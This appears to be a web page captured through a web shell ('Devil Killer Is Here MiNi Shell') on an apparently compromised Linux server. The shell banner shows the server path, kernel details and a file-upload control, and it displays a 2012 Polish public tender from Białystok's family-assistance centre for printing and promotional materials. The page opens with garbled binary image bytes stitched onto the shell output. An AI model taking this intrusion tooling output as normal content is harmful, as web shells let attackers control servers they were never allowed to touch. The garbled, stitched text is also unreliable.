JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120424/130924-N-2012.html

<p class="kh_header"><b>Białystok: Wykonanie  druków oraz materiałów informacyjno-promocyjnych na rzecz Miejskiego Ośrodka Pomocy Rodzinie w Białymstoku wraz z dostawą</b><br>
<b>Numer ogłoszenia: 130924 - 2012; data zamieszczenia: 24.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie w Białymstoku , ul. Malmeda 8, 15-440 Białystok, woj. podlaskie, tel. 0-85 678 31 03, faks 0-85 678 31 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:// www. mopr.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie  druków oraz materiałów informacyjno-promocyjnych na rzecz Miejskiego Ośrodka Pomocy Rodzinie w Białymstoku wraz z dostawą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:

a) PAKIET Nr 1: świadczenie usług poligraficznych w zakresie drukowania druków, plakatów, ulotek, wizytówek, szczegółowo określonych w Formularzu cenowym, stanowiącym załącznik nr 3 do SIWZ, 
dotyczących działalności Zamawiającego, zwanych dalej Drukami,  w zakresie :
- usług drukowania Druków,
- oprawy druków (szycie),
- dokonywania uzgodnień dotyczących przedmiotu zamówienia w siedzibie Zamawiającego,
- dostarczania Druków do siedziby Zamawiającego,

b) PAKIET Nr 2: umieszczenie logo Programu Operacyjnego Kapitał Ludzki, Unii Europejskiej, Miejskiego Ośrodka Pomocy Rodzinie w Białymstoku na materiałach informacyjno-promocyjnych projektu systemowego Aktywność kluczem do sukcesu realizowanego przez Miejski Ośrodek Pomocy Rodzinie w Białymstoku, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, szczegółowo określonych w Formularzu cenowym, stanowiącym załącznik nr 4 do  SIWZ, wykonanie oraz sprzedaży materiałów informacyjno- promocyjnych z umieszczonymi logotypami i dostarczenie do siedziby Zamawiającego przez Wykonawcę. 

 2. Wykaz Druków wraz z opisem wymaganych parametrów technicznych oraz nakładu poszczególnych Druków objętych przedmiotem zamówienia oraz usług powiązanych z ich przygotowaniem (ujętych w cenie Druków) stanowi Załącznik nr 3 do SIWZ - dotyczy PAKIETU Nr 1.

3. Wykaz materiałów informacyjno-promocyjnych wraz z opisem wymaganych parametrów technicznych oraz ilością poszczególnych materiałów objętych przedmiotem zamówienia oraz usług powiązanych z ich przygotowaniem (ujętych w cenie materiałów) stanowi Załącznik nr 4 do SIWZ - dotyczy PAKIETU  Nr 2.

4. Przedmiot zamówienia wykonywany będzie na podstawie projektów  graficznych przedstawionych przez Zamawiającego.

5. Zamawiający zastrzega sobie możliwość zmniejszenia ilości zakupu Druków i materiałów informacyjno-promocyjnych w każdej ze wskazanych w załącznikach nr 3 i nr 4 do SIWZ - Formularzach cenowych, w zależności od potrzeb Zamawiającego. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 30% ogólnej wartości zamówienia, tzn. zostanie zrealizowany w co najmniej 70%. W wyniku zmniejszenia ilości przedmiotu zamówienia wynagrodzenie Wykonawcy może ulec zmniejszeniu  proporcjonalnie do faktycznie wykonanej usługi. Z tego tytułu Wykonawcy nie przysługuje prawo do roszczeń w stosunku do niezrealizowanej części zamówienia. 
6. Zamawiający zastrzega sobie prawo dokonywania zmian ilościowych w poszczególnych pozycjach (rodzajach) zamawianych Druków i materiałów informacyjno-promocyjnych.
7. Rozliczenie z Wykonawcą dokonywane będzie na podstawie cen jednostkowych zawartych w ofercie i ilości faktycznie wykonanych, dostarczonych i odebranych Druków i materiałów  informacyjno-promocyjnych.

8. Dodatkowe warunki dotyczące przedmiotu zamówienia:
a) Termin płatności: 14 dni od daty otrzymania faktury przez Zamawiającego, 
b) Nie przewiduje się wypłacania zaliczek na poczet wykonania zamówienia,
c) forma zapłaty - jak we wzorze umowy, stanowiącym załącznik nr 8 (Pakiet Nr 1) oraz załącznik nr 9 (Pakiet nr 2) do specyfikacji istotnych warunków zamówienia,

d) Wykonanie i dostawa Druków będzie realizowana sukcesywnie przez okres trwania umowy, poprzez dostarczanie Druków partiami, stosownie do aktualnych potrzeb Zamawiającego. Wielkość dostarczenia każdej partii Druków będzie wynikać z jednostronnej dyspozycji osób odpowiedzialnych ze strony Zamawiającego za realizację przedmiotu umowy, zaś dostawa materiałów informacyjno-promocyjnych  zrealizowana zostanie jednorazowo,
 
e) Wykonawca dostarczy zamówione gotowe Druki do siedziby Zamawiającego oraz innych miejsc wskazanych przez Zamawiającego na terenie miasta Białegostoku , w godzinach od 8:00 do 14:00, własnym transportem, z rozładunkiem i wniesieniem, na własny koszt i ryzyko, w terminie wyznaczonym przez Zamawiającego w  zleceniu częściowym,

f) Wykonawca dostarczy zamówione materiały informacyjno-promocyjne do siedziby Zamawiającego jednorazowo , w godzinach od 8:00 do 14:00, własnym transportem, z rozładunkiem i wniesieniem, na własny koszt i ryzyko, w terminie 21 dni od daty podpisania umowy.

g) Wykonawca wskaże w ofercie ( oświadczenie na formularzu oferty) część zamówienia, której wykonanie zamierza powierzyć podwykonawcom. W przypadku nie wskazania części zamówienia, która ma być realizowana przez podwykonawcę Zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę osobiście..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy. 
2. Zamówienia uzupełniające mogą polegać na powtórzeniu tego samego rodzaju zamówienia lub jego części, zgodnego z przedmiotem zamówienia podstawowego, o wartości do 30% zamówienia podstawowego w okresie 3 lat od udzielenia zamówienia podstawowego (od dnia podpisania umowy).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje:
- Pakiet Nr 1 :  co najmniej dwie usługi  poligraficzne z zakresu drukowania  druków, i/lub plakatów, i/lub ulotek, i/lub wizytówek, o wartości nie mniejszej niż 25 000,00 zł brutto każda oraz załączy dokumenty potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie,

- Pakiet Nr 2:  co najmniej dwie usługi  poligraficzne związane z drukowaniem materiałów informacyjno-promocyjnych, o wartości nie mniejszej niż 5 000,00 zł brutto każda oraz załączy dokumenty potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający wymaga także dołączenia do oferty:
a) wypełnionego i podpisanego Formularza oferty z wykorzystaniem wzoru stanowiącego załącznik nr 1 (Pakiet Nr 1) ) i/lub nr 2 (Pakiet Nr 2) do  specyfikacji istotnych warunków zamówienia,  
b) wypełnionego i podpisanego Formularza cenowego z wykorzystaniem wzoru stanowiącego załącznik nr 3 (Pakiet Nr 1) i/lub nr 4 (Pakiet Nr 2)  do specyfikacji istotnych warunków zamówienia,
c) pełnomocnictwa podmiotów występujących wspólnie (np. konsorcjum, spółka cywilna),
d) w przypadku gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany warunków zawartej umowy w stosunku do treści oferty, na podstawie której wybrano Wykonawcę, polegającą na:

a) zmianie terminu realizacji przedmiotu umowy w przypadku:
- jeżeli jego niedotrzymanie wynika z działania siły wyższej, 
- wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu umowy,
- niemożliwości realizacji przedmiotu umowy w zakładanym terminie z przyczyn organizacyjnych leżących po stronie Zamawiającego,

b) zmianie w zakresie przedmiotu umowy:
- w związku ze zmniejszeniem przedmiotu umowy ze względu na nie zrealizowanie przedmiotu umowy w całości, tj. w ilościach wykazanych w ofercie Wykonawcy, bez konieczności zachowania formy pisemnej,
- w związku z dokonaniem zmian w  treści oraz formy druków w razie zmiany przepisów prawnych regulujących ich treść  lub zmian wynikających ze zmiany sposobu organizacji pracy Zamawiającego oraz zmian ilościowych w poszczególnych pozycjach (rodzajach) zamawianych druków (dotyczy Pakietu Nr 1),


- w związku ze zmianą oznaczania materiałów informacyjno-promocyjnych w razie zmiany obowiązujących wytycznych dotyczących oznaczania projektów  lub zmian wynikających ze zmiany sposobu organizacji pracy Zamawiającego oraz zmian ilościowych w poszczególnych pozycjach (rodzajach) zamawianych materiałów informacyjno-promocyjnych (dotyczy pakietu Nr 2),
c) zmianie wynagrodzenia w przypadku:
- ustawowej zmiany stawki podatku od towarów i usług (VAT) na dany rodzaj usługi o kwotę powstałą w wyniku zmiany stawki podatku VAT,
-  zmniejszenia ilości wykazanych w ofercie Wykonawcy  - wówczas zmiana wynagrodzenia będzie obliczona w oparciu o ceny jednostkowe wymienione w ofercie Wykonawcy, z uwzględnieniem ilości rzeczywiście wykonanych, dostarczonych i odebranych druków lub materiałów informacyjno-promocyjnych,

d) zmianie umowy wynikającej z innej, niemożliwej do przewidzenia w momencie zawarcia umowy, okoliczności prawnej, ekonomicznej lub technicznej, za którą żadna ze stron nie ponosi odpowiedzialności, skutkującą brakiem możliwości należytego wykonania umowy lub zmiana ta jest korzystna dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:// www. mopr.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Białymstoku, ul. Malmeda 8, 15-440 Białystok, woj. podlaskie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2012 godzina 09:45, miejsce: siedziba zamawiającego: Miejski Ośrodek Pomocy Rodzinie w Białymstoku, ul. Malmeda 8, 15-440 Białystok, sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie w części dotyczącej Pakietu NR 2 jest współfinansowane przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, w związku z realizacją przez Miejski Ośrodek Pomocy Rodzinie w Białymstoku projektu systemowego Aktywność kluczem do sukcesu..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET NR 1:świadczenie usług poligraficznych w zakresie drukowania druków, plakatów, ulotek, wizytówek, szczegółowo określonych w Formularzu cenowym, stanowiącym załącznik nr 3 do SIWZ, 
dotyczących działalności Zamawiającego, zwanych dalej Drukami,  w zakresie :
- usług drukowania Druków,
- oprawy druków (szycie),
- dokonywania uzgodnień dotyczących przedmiotu zamówienia w siedzibie Zamawiającego,
- dostarczania Druków do siedziby Zamawiającego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Wykonawca zobowiązany będzie do bieżącej współpracy z Zamawiającym oraz do wykonania wszystkich prac związanych z niniejszym zamówieniem i dostawy gotowych Druków w terminach wyznaczonych przez Zamawiającego,

2) Zamawiający będzie zamawiał Druki w partiach, stosownie do aktualnych potrzeb. Przez partię Zamawiający rozumie zamówienie całości lub części Druków danego rodzaju lub zamówienie kilku rodzajów Druków w całości lub w części. Wielkość dostarczenia każdej partii Druków będzie wynikać z jednostronnej dyspozycji osób odpowiedzialnych ze strony Zamawiającego za realizację przedmiotu umowy, przekazywanej faksem, telefonicznie, e-mailem lub pisemnie w formie zlecenia częściowego, z podaniem ilości, asortymentu, terminu i miejsca dostawy każdej kolejnej partii zamówienia,

3) Zamawiający przy każdorazowym zamówieniu kolejnej partii Druków, przekaże  Wykonawcy wzór Druku będącego przedmiotem danej partii zamówienia, z wyłączeniem Druków już wcześniej zaakceptowanych przez Zamawiającego,

4) Przed przystąpieniem do wykonania druków, Wykonawca zobowiązany będzie do uzyskania pisemnej akceptacji upoważnionych pracowników Zamawiającego, na przedstawionym (w formie elektronicznej lub na żądanie Zamawiającego papierowej) wydruku wstępnym danego rodzaju Druku (dotyczy treści, formy i układu wykonania druku). 
Uwaga: Nakład może być wydrukowany dopiero po uzyskaniu akceptacji wydruku wstępnego danego rodzaju Druku przez Zamawiającego.

5) Przedmiot zamówienia wykonywany będzie na podstawie projektów graficznych  przekazanych Wykonawcy  przez Zamawiającego,

6) Druki stanowiące przedmiot niniejszego zamówienia powinny być wykonane przez Wykonawcę zgodnie z obowiązującymi przepisami regulującymi treść tych druków, w szczególności: ustawą z dnia 12 marca 2004r. o pomocy społecznej (Dz. U. z 2009r. Nr 175, poz. 1362. z późn. zm.), Rozporządzeniem Ministra Polityki Społecznej z dnia 02 czerwca 2005r. w sprawie sposobu i trybu postępowania w sprawach o świadczenia rodzinne (Dz.U. Nr 105, poz. 881 z późn. zm.),  Rozporządzeniem Ministra Polityki Społecznej z dnia 25 stycznia 2011r. w sprawie rodzinnego wywiadu środowiskowego (Dz. U. Nr 27, poz. 138), Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 23 marca 2011 roku w sprawie wzoru kwestionariusza wywiadu alimentacyjnego oraz wzoru oświadczenia majątkowego dłużnika alimentacyjnego (Dz. U. Nr 73, poz. 395) oraz Rozporządzeniem Rady Ministrów z dnia 13  września 2011r.  w sprawie procedury Niebieskie Karty oraz wzorów formularzy Niebieska Karta (Dz. U. Nr 209, poz. 1245),
7) Zamawiający zastrzega sobie możliwość zmiany treści oraz formy druków w razie zmiany przepisów prawnych regulujących ich treść lub zmian wynikających ze zmiany sposobu organizacji pracy Zamawiającego,
8) Wykonawca dostarczy zamówione gotowe Druki do siedziby Zamawiającego oraz innych miejsc wskazanych przez Zamawiającego na terenie miasta Białegostoku ( cztery lokalizacje), w godzinach od 800 do 1400, własnym transportem, z rozładunkiem i wniesieniem, na własny koszt i ryzyko, w terminie wyznaczonym przez Zamawiającego w  zleceniu częściowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET NR 2:umieszczenie logo Programu Operacyjnego Kapitał Ludzki, Europejskiego Unii Europejskiej, Miejskiego Ośrodka Pomocy Rodzinie w Białymstoku, i umieszczenie go na materiałach informacyjno-promocyjnych projektu systemowego Aktywność kluczem do sukcesu realizowanego przez Miejski Ośrodek Pomocy Rodzinie w Białymstoku, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Wykonawca zobowiązany będzie do bieżącej współpracy z Zamawiającym oraz do wykonania wszystkich prac związanych z niniejszym zamówieniem i dostarczenia gotowych materiałów informacyjno-promocyjnych w terminie wyznaczonym przez Zamawiającego,

2) Wykonawca zobowiązany będzie do umieszczenia logo Programu Operacyjnego Kapitał Ludzki, Unii Europejskiej, Miejskiego Ośrodka Pomocy Rodzinie w Białymstoku i umieszczenie go na materiałach informacyjno-promocyjnych szczegółowo określonych w  Formularzu cenowym, stanowiącym załącznik nr 4 do SIWZ, wykonanie i sprzedaży materiałów informacyjno- promocyjnych z umieszczonymi  logotypami oraz dostarczenia do siedziby Zamawiającego przez Wykonawcę,

3)  Wykonawca zobowiązany będzie do naniesienia na materiały promocyjne logo PO KL, MOPR, UE, zgodnie ze wskazaniami Zamawiającego, oraz Wytycznymi dotyczącymi oznaczania projektów w ramach programu operacyjnego Kapitał Ludzki z dnia 04 lutego 2009r., wydanymi przez Ministerstwo Rozwoju Regionalnego, dostępnymi na stronie internetowej: www.gov.pl/Dokuments/wytyczne_04_02.pdf.
